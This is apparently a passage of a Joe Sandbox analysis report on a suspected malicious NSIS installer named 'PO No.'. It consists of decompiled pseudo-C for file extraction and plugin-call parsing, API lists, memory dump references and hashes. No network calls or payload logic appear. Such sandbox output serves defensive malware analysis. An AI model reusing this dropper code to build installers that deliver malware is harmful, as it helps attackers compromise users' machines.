                                                                      							_t76 = _v16;
                                                                      							goto L32;
                                                                      						}
                                                                      					}
                                                                      					__eflags = _t86 - 0x5a04;
                                                                      					if(_t86 == 0x5a04) {
                                                                      						goto L13;
                                                                      					}
                                                                      					__eflags = _t76 - 0x23;
                                                                      					if(_t76 == 0x23) {
                                                                      						goto L13;
                                                                      					}
                                                                      					__eflags = _t76 - 0x2e;
                                                                      					if(_t76 == 0x2e) {
                                                                      						goto L13;
                                                                      					} else {
                                                                      						_v8 = _v8 & 0x00000000;
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      				 *_t110 =  *_t110 & 0x00000000;
                                                                      				if(_a4 == 0) {
                                                                      					return _t44;
                                                                      				}
                                                                      				return E004063B0(_a4, _t44);
                                                                      			}






























                                                                      0x004063d2
                                                                      0x004063d2
                                                                      0x004063d2
                                                                      0x004063d8
                                                                      0x004063dd
                                                                      0x004063ee
                                                                      0x004063ee
                                                                      0x004063f6
                                                                      0x004063f7
                                                                      0x004063f8
                                                                      0x004063f9
                                                                      0x004063fc
                                                                      0x00406404
                                                                      0x00406406
                                                                      0x0040641f
                                                                      0x00406422
                                                                      0x00406422
                                                                      0x0040661e
                                                                      0x0040661e
                                                                      0x00406624
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406432
                                                                      0x00406438
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406440
                                                                      0x00406441
                                                                      0x00406443
                                                                      0x00406447
                                                                      0x0040644a
                                                                      0x0040660b
                                                                      0x00406619
                                                                      0x0040661c
                                                                      0x0040661c
                                                                      0x0040660d
                                                                      0x00406610
                                                                      0x00406613
                                                                      0x00406615
                                                                      0x00406615
                                                                      0x00000000
                                                                      0x0040660b
                                                                      0x00406450
                                                                      0x00406453
                                                                      0x00406462
                                                                      0x00406469
                                                                      0x00406473
                                                                      0x00406477
                                                                      0x0040647a
                                                                      0x0040647d
                                                                      0x00406482
                                                                      0x00406487
                                                                      0x0040648b
                                                                      0x0040648e
                                                                      0x004065ae
                                                                      0x004065b2
                                                                      0x004065e5
                                                                      0x004065e9
                                                                      0x004065ee
                                                                      0x004065f3
                                                                      0x004065f3
                                                                      0x004065f8
                                                                      0x004065f9
                                                                      0x004065fe
                                                                      0x00406601
                                                                      0x00406604
                                                                      0x00000000
                                                                      0x00406604
                                                                      0x004065b4
                                                                      0x004065b7
                                                                      0x004065ba
                                                                      0x004065cf
                                                                      0x004065d6
                                                                      0x004065bc
                                                                      0x004065c3
                                                                      0x004065c3
                                                                      0x004065de
                                                                      0x004065e1
                                                                      0x004065a6
                                                                      0x004065a7
                                                                      0x004065a7
                                                                      0x00000000
                                                                      0x004065e1
                                                                      0x00406494
                                                                      0x0040649c
                                                                      0x0040649e
                                                                      0x0040649f
                                                                      0x004064b8
                                                                      0x004064b8
                                                                      0x004064bf
                                                                      0x004064bf
                                                                      0x004064c6
                                                                      0x004064ca
                                                                      0x004064ca
                                                                      0x004064cb
                                                                      0x004064cd
                                                                      0x00406508
                                                                      0x0040650b
                                                                      0x0040651b
                                                                      0x0040651e
                                                                      0x00406526
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x00406589
                                                                      0x00406589
                                                                      0x0040658b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406530
                                                                      0x00406537
                                                                      0x00406538
                                                                      0x0040653a
                                                                      0x00406554
                                                                      0x00406562
                                                                      0x00406568
                                                                      0x0040656a
                                                                      0x00406585
                                                                      0x00406585
                                                                      0x00406585
                                                                      0x00000000
                                                                      0x00406585
                                                                      0x00406570
                                                                      0x0040657b
                                                                      0x00406581
                                                                      0x00406583
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406583
                                                                      0x0040653c
                                                                      0x0040653f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040654e
                                                                      0x00406550
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00406589
                                                                      0x00406513
                                                                      0x00000000
                                                                      0x004064cf
                                                                      0x004064ed
                                                                      0x004064f2
                                                                      0x004064f6
                                                                      0x00406596
                                                                      0x00406596
                                                                      0x00406599
                                                                      0x004065a1
                                                                      0x004065a1
                                                                      0x00000000
                                                                      0x00406599
                                                                      0x004064fe
                                                                      0x0040658d
                                                                      0x0040658d
                                                                      0x00406591
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406593
                                                                      0x00000000
                                                                      0x00406593
                                                                      0x004064cd
                                                                      0x004064a1
                                                                      0x004064a6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064a8
                                                                      0x004064ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x00000000
                                                                      0x004064b2
                                                                      0x004064b2
                                                                      0x00000000
                                                                      0x004064b2
                                                                      0x004064b0
                                                                      0x0040662a
                                                                      0x00406635
                                                                      0x00406641
                                                                      0x00406641
                                                                      0x00000000

                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                                      • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 717251189-1230650788
                                                                      • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                      • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                      • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                      • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 637 40176f-401794 call 402c37 call 405cf8 642 401796-40179c call 4063b0 637->642 643 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 637->643 648 4017b5-4017b6 call 406644 642->648 643->648 652 4017bb-4017bf 648->652 653 4017c1-4017cb call 4066f3 652->653 654 4017f2-4017f5 652->654 662 4017dd-4017ef 653->662 663 4017cd-4017db CompareFileTime 653->663 655 4017f7-4017f8 call 405e7d 654->655 656 4017fd-401819 call 405ea2 654->656 655->656 664 40181b-40181e 656->664 665 40188d-4018b6 call 405414 call 4031ba 656->665 662->654 663->662 666 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 664->666 667 40186f-401879 call 405414 664->667 677 4018b8-4018bc 665->677 678 4018be-4018ca SetFileTime 665->678 666->652 699 401864-401865 666->699 679 401882-401888 667->679 677->678 681 4018d0-4018db CloseHandle 677->681 678->681 682 402ac8 679->682 684 4018e1-4018e4 681->684 685 402abf-402ac2 681->685 686 402aca-402ace 682->686 688 4018e6-4018f7 call 4063d2 lstrcatW 684->688 689 4018f9-4018fc call 4063d2 684->689 685->682 696 401901-4022f6 call 405a12 688->696 689->696 696->686 699->679 701 401867-401868 699->701 701->667
                                                                      C-Code - Quality: 77%
                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                      				void* __edi;
                                                                      				void* _t35;
                                                                      				void* _t43;
                                                                      				void* _t45;
                                                                      				FILETIME* _t51;
                                                                      				FILETIME* _t64;
                                                                      				void* _t66;
                                                                      				signed int _t72;
                                                                      				FILETIME* _t73;
                                                                      				FILETIME* _t77;
                                                                      				signed int _t79;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      				WCHAR* _t84;
                                                                      				void* _t86;
                                                                      
                                                                      				_t77 = __ebx;
                                                                      				 *(_t86 - 8) = E00402C37(0x31);
                                                                      				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                                                      				_t35 = E00405CF8( *(_t86 - 8));
                                                                      				_push( *(_t86 - 8));
                                                                      				_t84 = L"Call";
                                                                      				if(_t35 == 0) {
                                                                      					lstrcatW(E00405C81(E004063B0(_t84, L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose\\Circularizations126\\Iltningernes\\Mellivorous")), ??);
                                                                      				} else {
                                                                      					E004063B0();
                                                                      				}
                                                                      				E00406644(_t84);
                                                                      				while(1) {
                                                                      					__eflags =  *(_t86 + 8) - 3;
                                                                      					if( *(_t86 + 8) >= 3) {
                                                                      						_t66 = E004066F3(_t84);
                                                                      						_t79 = 0;
                                                                      						__eflags = _t66 - _t77;
                                                                      						if(_t66 != _t77) {
                                                                      							_t73 = _t66 + 0x14;
                                                                      							__eflags = _t73;
                                                                      							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                      						__eflags = _t72;
                                                                      						 *(_t86 + 8) = _t72;
                                                                      					}
                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                      					if( *(_t86 + 8) == _t77) {
                                                                      						E00405E7D(_t84);
                                                                      					}
                                                                      					__eflags =  *(_t86 + 8) - 1;
                                                                      					_t43 = E00405EA2(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                      					__eflags = _t43 - 0xffffffff;
                                                                      					 *(_t86 - 0x30) = _t43;
                                                                      					if(_t43 != 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                      					if( *(_t86 + 8) != _t77) {
                                                                      						E00405414(0xffffffe2,  *(_t86 - 8));
                                                                      						__eflags =  *(_t86 + 8) - 2;
                                                                      						if(__eflags == 0) {
                                                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                      						}
                                                                      						L31:
                                                                      						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                      						__eflags =  *0x42a2e8;
                                                                      						goto L32;
                                                                      					} else {
                                                                      						E004063B0("C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp", _t81);
                                                                      						E004063B0(_t81, _t84);
                                                                      						E004063D2(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                                                      						E004063B0(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp");
                                                                      						_t64 = E00405A12("C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                                                      						__eflags = _t64;
                                                                      						if(_t64 == 0) {
                                                                      							continue;
                                                                      						} else {
                                                                      							__eflags = _t64 == 1;
                                                                      							if(_t64 == 1) {
                                                                      								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                      								L32:
                                                                      								_t51 = 0;
                                                                      								__eflags = 0;
                                                                      							} else {
                                                                      								_push(_t84);
                                                                      								_push(0xfffffffa);
                                                                      								E00405414();
                                                                      								L29:
                                                                      								_t51 = 0x7fffffff;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L33:
                                                                      					return _t51;
                                                                      				}
                                                                      				E00405414(0xffffffea,  *(_t86 - 8));
                                                                      				 *0x42a314 =  *0x42a314 + 1;
                                                                      				_t45 = E004031BA(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
                                                                      				 *0x42a314 =  *0x42a314 - 1;
                                                                      				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                                                      				_t82 = _t45;
                                                                      				if( *(_t86 - 0x1c) != 0xffffffff) {
                                                                      					L22:
                                                                      					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                                                      				} else {
                                                                      					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                                                      					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                                                      						goto L22;
                                                                      					}
                                                                      				}
                                                                      				CloseHandle( *(_t86 - 0x30)); // executed
                                                                      				__eflags = _t82 - _t77;
                                                                      				if(_t82 >= _t77) {
                                                                      					goto L31;
                                                                      				} else {
                                                                      					__eflags = _t82 - 0xfffffffe;
                                                                      					if(_t82 != 0xfffffffe) {
                                                                      						E004063D2(_t77, _t82, _t84, _t84, 0xffffffee);
                                                                      					} else {
                                                                      						E004063D2(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                                      						lstrcatW(_t84,  *(_t86 - 8));
                                                                      					}
                                                                      					_push(0x200010);
                                                                      					_push(_t84);
                                                                      					E00405A12();
                                                                      					goto L29;
                                                                      				}
                                                                      				goto L33;
                                                                      			}


















                                                                      0x0040176f
                                                                      0x00401776
                                                                      0x00401782
                                                                      0x00401785
                                                                      0x0040178a
                                                                      0x0040178d
                                                                      0x00401794
                                                                      0x004017b0
                                                                      0x00401796
                                                                      0x00401797
                                                                      0x00401797
                                                                      0x004017b6
                                                                      0x004017bb
                                                                      0x004017bb
                                                                      0x004017bf
                                                                      0x004017c2
                                                                      0x004017c7
                                                                      0x004017c9
                                                                      0x004017cb
                                                                      0x004017d0
                                                                      0x004017d0
                                                                      0x004017db
                                                                      0x004017db
                                                                      0x004017ec
                                                                      0x004017ee
                                                                      0x004017ee
                                                                      0x004017ef
                                                                      0x004017ef
                                                                      0x004017f2
                                                                      0x004017f5
                                                                      0x004017f8
                                                                      0x004017f8
                                                                      0x004017ff
                                                                      0x0040180e
                                                                      0x00401813
                                                                      0x00401816
                                                                      0x00401819
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040181b
                                                                      0x0040181e
                                                                      0x00401874
                                                                      0x00401879
                                                                      0x004015b6
                                                                      0x00402885
                                                                      0x00402885
                                                                      0x00402abf
                                                                      0x00402ac2
                                                                      0x00402ac2
                                                                      0x00000000
                                                                      0x00401820
                                                                      0x00401826
                                                                      0x0040182d
                                                                      0x0040183a
                                                                      0x00401845
                                                                      0x0040185b
                                                                      0x0040185b
                                                                      0x0040185e
                                                                      0x00000000
                                                                      0x00401864
                                                                      0x00401864
                                                                      0x00401865
                                                                      0x00401882
                                                                      0x00402ac8
                                                                      0x00402ac8
                                                                      0x00402ac8
                                                                      0x00401867
                                                                      0x00401867
                                                                      0x00401868
                                                                      0x00401493
                                                                      0x004022f1
                                                                      0x004022f1
                                                                      0x004022f1
                                                                      0x00401865
                                                                      0x0040185e
                                                                      0x00402aca
                                                                      0x00402ace
                                                                      0x00402ace
                                                                      0x00401892
                                                                      0x00401897
                                                                      0x004018a5
                                                                      0x004018aa
                                                                      0x004018b0
                                                                      0x004018b4
                                                                      0x004018b6
                                                                      0x004018be
                                                                      0x004018ca
                                                                      0x004018b8
                                                                      0x004018b8
                                                                      0x004018bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004018bc
                                                                      0x004018d3
                                                                      0x004018d9
                                                                      0x004018db
                                                                      0x00000000
                                                                      0x004018e1
                                                                      0x004018e1
                                                                      0x004018e4
                                                                      0x004018fc
                                                                      0x004018e6
                                                                      0x004018e9
                                                                      0x004018f2
                                                                      0x004018f2
                                                                      0x00401901
                                                                      0x00401906
                                                                      0x004022ec
                                                                      0x00000000
                                                                      0x004022ec
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous,?,?,00000031), ref: 004017D5
                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsh409.tmp$C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll$C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous$Call
                                                                      • API String ID: 1941528284-551300041
                                                                      • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                      • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                      • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                      • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E10001B18() {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				short _v16;
                                                                      				signed int _v20;
                                                                      				WCHAR* _v24;
                                                                      				short* _v28;
                                                                      				short _v32;
                                                                      				signed int _v36;
                                                                      				short _v40;
                                                                      				WCHAR* _v44;
                                                                      				signed int _v48;
                                                                      				void* _v52;
                                                                      				short _v56;
                                                                      				short* _t187;
                                                                      				short _t190;
                                                                      				void* _t192;
                                                                      				void* _t194;
                                                                      				WCHAR* _t196;
                                                                      				void* _t204;
                                                                      				struct HINSTANCE__* _t205;
                                                                      				void* _t206;
                                                                      				struct HINSTANCE__* _t207;
                                                                      				short _t209;
                                                                      				void* _t211;
                                                                      				intOrPtr* _t212;
                                                                      				short _t213;
                                                                      				void* _t224;
                                                                      				signed char _t225;
                                                                      				signed char _t226;
                                                                      				void* _t230;
                                                                      				short _t232;
                                                                      				void* _t233;
                                                                      				signed int _t235;
                                                                      				signed int _t237;
                                                                      				signed int _t243;
                                                                      				void* _t244;
                                                                      				signed int _t247;
                                                                      				signed int _t250;
                                                                      				signed int _t251;
                                                                      				signed int _t256;
                                                                      				signed int _t257;
                                                                      				signed int _t258;
                                                                      				signed int _t259;
                                                                      				void* _t262;
                                                                      				void* _t266;
                                                                      				short _t269;
                                                                      				signed int _t273;
                                                                      				void _t274;
                                                                      				signed int _t275;
                                                                      				signed int _t282;
                                                                      				signed int _t283;
                                                                      				signed short _t289;
                                                                      				signed int _t291;
                                                                      				WCHAR* _t292;
                                                                      				WCHAR* _t295;
                                                                      				struct HINSTANCE__* _t297;
                                                                      				void* _t299;
                                                                      				signed int _t301;
                                                                      				void* _t303;
                                                                      
                                                                      				_t269 = 0;
                                                                      				_v32 = 0;
                                                                      				_v36 = 0;
                                                                      				_v16 = 0;
                                                                      				_v8 = 0;
                                                                      				_v40 = 0;
                                                                      				_t303 = 0;
                                                                      				_v48 = 0;
                                                                      				_t187 = E1000121B();
                                                                      				_v24 = _t187;
                                                                      				_v28 = _t187;
                                                                      				_v44 = E1000121B();
                                                                      				_t291 = E10001243();
                                                                      				_v52 = _t291;
                                                                      				_v12 = _t291;
                                                                      				while(1) {
                                                                      					_t190 = _v32;
                                                                      					_v56 = _t190;
                                                                      					if(_t190 != _t269 && _t303 == _t269) {
                                                                      						break;
                                                                      					}
                                                                      					_t289 =  *_t291;
                                                                      					_t273 = _t289 & 0x0000ffff;
                                                                      					_t192 = _t273 - _t269;
                                                                      					if(_t192 == 0) {
                                                                      						_t33 =  &_v32;
                                                                      						 *_t33 = _v32 | 0xffffffff;
                                                                      						__eflags =  *_t33;
                                                                      						goto L17;
                                                                      					} else {
                                                                      						_t233 = _t192 - 0x23;
                                                                      						if(_t233 == 0) {
                                                                      							__eflags = _t291 - _v52;
                                                                      							if(_t291 <= _v52) {
                                                                      								L15:
                                                                      								_v32 = _t269;
                                                                      								_v36 = _t269;
                                                                      								goto L17;
                                                                      							} else {
                                                                      								__eflags =  *((short*)(_t291 - 2)) - 0x3a;
                                                                      								if( *((short*)(_t291 - 2)) != 0x3a) {
                                                                      									goto L15;
                                                                      								} else {
                                                                      									__eflags = _v32 - _t269;
                                                                      									if(_v32 == _t269) {
                                                                      										goto L40;
                                                                      									} else {
                                                                      										goto L15;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t262 = _t233 - 5;
                                                                      							if(_t262 == 0) {
                                                                      								__eflags = _v36 - 3;
                                                                      								_v32 = 1;
                                                                      								_v8 = _t269;
                                                                      								_v20 = _t269;
                                                                      								_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                      								_v40 = _t269;
                                                                      								goto L17;
                                                                      							} else {
                                                                      								_t266 = _t262 - 1;
                                                                      								if(_t266 == 0) {
                                                                      									_v32 = 2;
                                                                      									_v8 = _t269;
                                                                      									_v20 = _t269;
                                                                      									goto L17;
                                                                      								} else {
                                                                      									if(_t266 != 0x16) {
                                                                      										L40:
                                                                      										_t235 = _v32 - _t269;
                                                                      										__eflags = _t235;
                                                                      										if(_t235 == 0) {
                                                                      											__eflags = _t273 - 0x2a;
                                                                      											if(_t273 == 0x2a) {
                                                                      												_v36 = 2;
                                                                      												goto L61;
                                                                      											} else {
                                                                      												__eflags = _t273 - 0x2d;
                                                                      												if(_t273 == 0x2d) {
                                                                      													L132:
                                                                      													__eflags = _t289 - 0x2d;
                                                                      													if(_t289 != 0x2d) {
                                                                      														L135:
                                                                      														_t237 = _t291 + 2;
                                                                      														__eflags =  *_t237 - 0x3a;
                                                                      														if( *_t237 != 0x3a) {
                                                                      															goto L142;
                                                                      														} else {
                                                                      															__eflags = _t289 - 0x2d;
                                                                      															if(_t289 == 0x2d) {
                                                                      																goto L142;
                                                                      															} else {
                                                                      																_v36 = 1;
                                                                      																goto L138;
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t237 = _t291 + 2;
                                                                      														__eflags =  *_t237 - 0x3e;
                                                                      														if( *_t237 != 0x3e) {
                                                                      															goto L135;
                                                                      														} else {
                                                                      															_v36 = 3;
                                                                      															L138:
                                                                      															_v12 = _t237;
                                                                      															__eflags = _v28 - _v24;
                                                                      															if(_v28 <= _v24) {
                                                                      																 *_v44 = _t269;
                                                                      															} else {
                                                                      																 *_v28 = _t269;
                                                                      																lstrcpyW(_v44, _v24);
                                                                      															}
                                                                      															goto L61;
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													__eflags = _t273 - 0x3a;
                                                                      													if(_t273 != 0x3a) {
                                                                      														goto L142;
                                                                      													} else {
                                                                      														goto L132;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											break;
                                                                      										} else {
                                                                      											_t243 = _t235 - 1;
                                                                      											__eflags = _t243;
                                                                      											if(_t243 == 0) {
                                                                      												L74:
                                                                      												_t244 = _t273 - 0x22;
                                                                      												__eflags = _t244 - 0x55;
                                                                      												if(_t244 > 0x55) {
                                                                      													goto L61;
                                                                      												} else {
                                                                      													switch( *((intOrPtr*)(( *(_t244 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                                      														case 0:
                                                                      															__ecx = _v24;
                                                                      															__edi = _v12;
                                                                      															while(1) {
                                                                      																__edi = __edi + 1;
                                                                      																__edi = __edi + 1;
                                                                      																_v12 = __edi;
                                                                      																__ax =  *__edi;
                                                                      																__eflags = __ax - __dx;
                                                                      																if(__ax != __dx) {
                                                                      																	goto L117;
                                                                      																}
                                                                      																L116:
                                                                      																__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                      																if( *((intOrPtr*)(__edi + 2)) == __dx) {
                                                                      																	goto L117;
                                                                      																}
                                                                      																L121:
                                                                      																 *__ecx =  *__ecx & 0x00000000;
                                                                      																__ebx = E1000122C(_v24);
                                                                      																goto L92;
                                                                      																L117:
                                                                      																__eflags = __ax;
                                                                      																if(__ax != 0) {
                                                                      																	__eflags = __ax - __dx;
                                                                      																	if(__ax == __dx) {
                                                                      																		__edi = __edi + 1;
                                                                      																		__edi = __edi + 1;
                                                                      																		__eflags = __edi;
                                                                      																	}
                                                                      																	__ax =  *__edi;
                                                                      																	 *__ecx =  *__edi;
                                                                      																	__ecx = __ecx + 1;
                                                                      																	__ecx = __ecx + 1;
                                                                      																	__edi = __edi + 1;
                                                                      																	__edi = __edi + 1;
                                                                      																	_v12 = __edi;
                                                                      																	__ax =  *__edi;
                                                                      																	__eflags = __ax - __dx;
                                                                      																	if(__ax != __dx) {
                                                                      																		goto L117;
                                                                      																	}
                                                                      																}
                                                                      																goto L121;
                                                                      															}
                                                                      														case 1:
                                                                      															_v8 = 1;
                                                                      															goto L61;
                                                                      														case 2:
                                                                      															_v8 = _v8 | 0xffffffff;
                                                                      															goto L61;
                                                                      														case 3:
                                                                      															_v8 = _v8 & 0x00000000;
                                                                      															_v20 = _v20 & 0x00000000;
                                                                      															_v16 = _v16 + 1;
                                                                      															goto L79;
                                                                      														case 4:
                                                                      															__eflags = _v20;
                                                                      															if(_v20 != 0) {
                                                                      																goto L61;
                                                                      															} else {
                                                                      																_v12 = _v12 - 2;
                                                                      																__ebx = E1000121B();
                                                                      																 &_v12 = E10001A9F( &_v12);
                                                                      																__eax = E10001470(__edx, __eax, __edx, __ebx);
                                                                      																goto L92;
                                                                      															}
                                                                      															goto L157;
                                                                      														case 5:
                                                                      															L100:
                                                                      															_v20 = _v20 + 1;
                                                                      															goto L61;
                                                                      														case 6:
                                                                      															_push(7);
                                                                      															goto L108;
                                                                      														case 7:
                                                                      															_push(0x19);
                                                                      															goto L128;
                                                                      														case 8:
                                                                      															_push(0x15);
                                                                      															goto L128;
                                                                      														case 9:
                                                                      															_push(0x16);
                                                                      															goto L128;
                                                                      														case 0xa:
                                                                      															_push(0x18);
                                                                      															goto L128;
                                                                      														case 0xb:
                                                                      															_push(5);
                                                                      															goto L108;
                                                                      														case 0xc:
                                                                      															__eax = 0;
                                                                      															__eax = 1;
                                                                      															goto L85;
                                                                      														case 0xd:
                                                                      															_push(6);
                                                                      															goto L108;
                                                                      														case 0xe:
